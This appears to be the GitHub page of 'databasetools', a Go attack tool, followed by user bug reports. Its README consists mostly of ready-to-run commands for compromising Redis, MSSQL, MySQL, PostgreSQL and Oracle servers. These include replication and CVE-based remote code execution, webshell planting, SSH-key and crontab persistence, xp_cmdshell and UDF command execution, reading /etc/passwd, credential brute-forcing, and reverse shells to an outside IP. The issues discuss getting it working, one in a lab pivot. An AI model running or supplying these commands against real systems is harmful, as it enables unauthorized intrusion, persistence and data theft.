
databasetools's Introduction

Redis

Connect to Redis and get an SQL shell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -cli


Master-slave replication RCE

//Linux
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -so exp.so
go run .\main.go -redis  -rhost 192.168.111.211  -lhost 192.168.1.110 -exec -console -so exp.so


Lua sandbox escape command execution (CVE-2022-0543)

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -lua -console


Write an SSH public key

Replace the public key in ssh.txt with one you generated yourself.

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -sshkey

Write a webshell

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -shell


Scheduled task (crontab)

The contents of crontab.txt need to be edited first.

go run .\main.go -redis -rhost 192.168.111.211 -rport 6379 -crontab

MSSQL

Connect to the database and get an SQL shell

go run .\main.go -mssql -rhost 192.168.111.223 -rport 1433 -ruser sa -pwd "1qaz@WSX"  -cli


Enable xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp


Get a shell that executes system commands via xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isxp -console


Execute a single system command via xp_cmdshell

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isxp -docmd -cmd "whoami"


Enable sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp


Get a shell that executes system commands via sp_oacreate

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -issp -console


Execute a single system command via sp_oacreate

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -issp -docmd -cmd "whoami"


Get a shell that executes system commands via CLR

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -isclr -console


Execute a single system command via CLR

go run main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX"  -isclr -docmd -cmd "whoami"


Getshell by writing via log backup

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -shell -logshell -path "C:\phpStudy\WWW\aa.php" -e 'php'


Getshell via differential backup

go run .\main.go -mssql -rhost 192.168.111.136 -rport 1433 -pwd "1qaz@WSX" -difshell -path "C:\phpStudy\WWW\shell.php" -e 'php'


SSH connection

go run .\main.go -ssh -ruser root -rhost 192.168.111.139 -pwd "1qaz@WSX"


Mysql

Connect and get an SQL shell

go run .\main.go -mysql -ruser root -rhost 192.168.111.134 -pwd "root" -rport 3306 -cli


Get a webshell via INTO OUTFILE

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -outfileshell -path "C:\\\\phpStudy\\\\WWW\\\\aaa.php"


Getshell via the general log

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -shell -generallog -path C:\\\\phpStudy\\\\WWW\\\\aam.php


UDF privilege escalation

go run .\main.go -mysql -ruser root -rhost 192.168.111.136 -pwd "root" -rport 3306 -udf


postgresql

Connect to the PostgreSQL database and get an SQL shell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.162 -rport "5432" -cli


Execute commands in a loop using CVE-2019-9193

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -console


Execute a single command using CVE-2019-9193

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -CVE20199193 -cmd "pwd"


Single file read (method 1)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -file "/etc/passwd"


File read in a loop (method 1)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read1 -console


Single file read (method 2)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -file "/etc/passwd"

Convert the returned hex value to a string to get the result.

File read in a loop (method 2)

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -read2 -console


List a directory

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -file "./"


List directories in a loop

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -list -console


Upload a webshell

go run main.go -postgre -ruser  "postgres" -pwd "postgres" -rhost 192.168.111.139 -rport "5432" -write -uploadpath "/tmp/shell.jsp" -e "jsp"


Oracle

The Oracle client must be installed before use.

Installation on Windows: extract the downloaded instantclient_21_8 archive and add the extracted directory to the system PATH variable.

On Linux, Redis, MySQL, SQL Server and PostgreSQL are supported normally; to use the Oracle features, the Oracle client driver must be installed. Under Kali, all features run without problems.

Get an SQL shell

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli


Execute commands in a loop via DBMS_Export_Extension

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console


Execute a single command via DBMS_Export_Extension

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"


Reverse shell via DBMS_Export_Extension

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re


Execute system commands in a loop via DBMS_XMLQUERY

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console


Execute a single system command via DBMS_XMLQUERY

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"


Remove the command execution function

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del


Reverse shell via dbms_java_test.funcall

go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc


Brute-force database credentials

Mysql

go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql


MSSQL

go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql


Postgresql

go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql


Redis

go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis


Oracle

go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle


databasetools's People

Contributors

hel10-web

databasetools's Issues

Error when connecting to mssql

./main -mssql -rhost 192.1.1.27 -rport 1433 -ruser sa -pwd "sa" -cli

```
2023/11/23 14:56:10 [-] TLS Handshake failed: tls: server selected unsupported protocol version 301
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x20 pc=0x4f3133]

goroutine 1 [running]:
database/sql.(*DB).conn(0x0, {0xbcf5f0, 0xc00011e000}, 0x1)
/usr/local/go/src/database/sql/sql.go:1288 +0x53
database/sql.(*DB).prepare(0xc00014bce8?, {0xbcf5f0, 0xc00011e000}, {0xae712c, 0x11}, 0x0?)
/usr/local/go/src/database/sql/sql.go:1586 +0x45
database/sql.(*DB).PrepareContext(0xc0004260c0?, {0xbcf5f0, 0xc00011e000}, {0xae712c, 0x11})
/usr/local/go/src/database/sql/sql.go:1555 +0x96
database/sql.(*DB).Prepare(...)
/usr/local/go/src/database/sql/sql.go:1576
Databasetools/pac.MssqlCMD({0xae712c?, 0xc00012c010?}, 0x7ffc75725744?)
/root/Databasetools/pac/mssql_cmd.go:15 +0x6e
Databasetools/pac.Help()
/root/Databasetools/pac/help.go:215 +0x926
main.main()
/root/Databasetools/main.go:8 +0x17
```

The port is 9090, so why does it still become 1433?

go run .\main.go -mssql -rhost 14.23.58.6 -rport 9003 -ruser sa -pwd "xxxc" -cli

Error message: unable to open tcp connection with host '14.23.58.6:1433': dial tcp 14.23.58.186:1433: connectex: No connection could be made because the target machine actively refused it.
panic: runtime error: invalid memory address or nil pointer dereference

Redis connection timeout issue

Hello. While using the tool for study, I was doing a Redis unauthorized-access test against my local test environment. The environment is vulntarget-a; the local attacker IP is 192.168.3.164 and the target machine with outbound access is 192.168.3.168. I have already obtained access on the outbound machine and use it as a proxy to attack the internal device Win-2016. From the local attacker I can connect through the proxy to Redis on Win-2016 normally; the connection screenshot is below:

When I wanted to use your tool for the next step of testing, it kept reporting a connection timeout.

I tried changing the Redis connection timeout to 30 seconds.

It still cannot connect normally. Could you tell me whether I have set something up wrong? Thank you for open-sourcing this.

Oracle database connection issue

The oracleshell.jar tool supports both normal privileges and DBA privileges; it seems you have not written the DBA-privilege part. When I use the system account it shows that the current account does not have DBA privileges (the Oracle instance is on Windows).

Also, Oracle can list directories as well.
I hope these two features can be added.

No timeout

Hello, the code is very well written; I studied it carefully for several days and also reproduced it locally for several days. I have one question: for things like brute-forcing, if the network is very slow, how do I deal with the timeout problem? For example the PostgreSQL timeout.
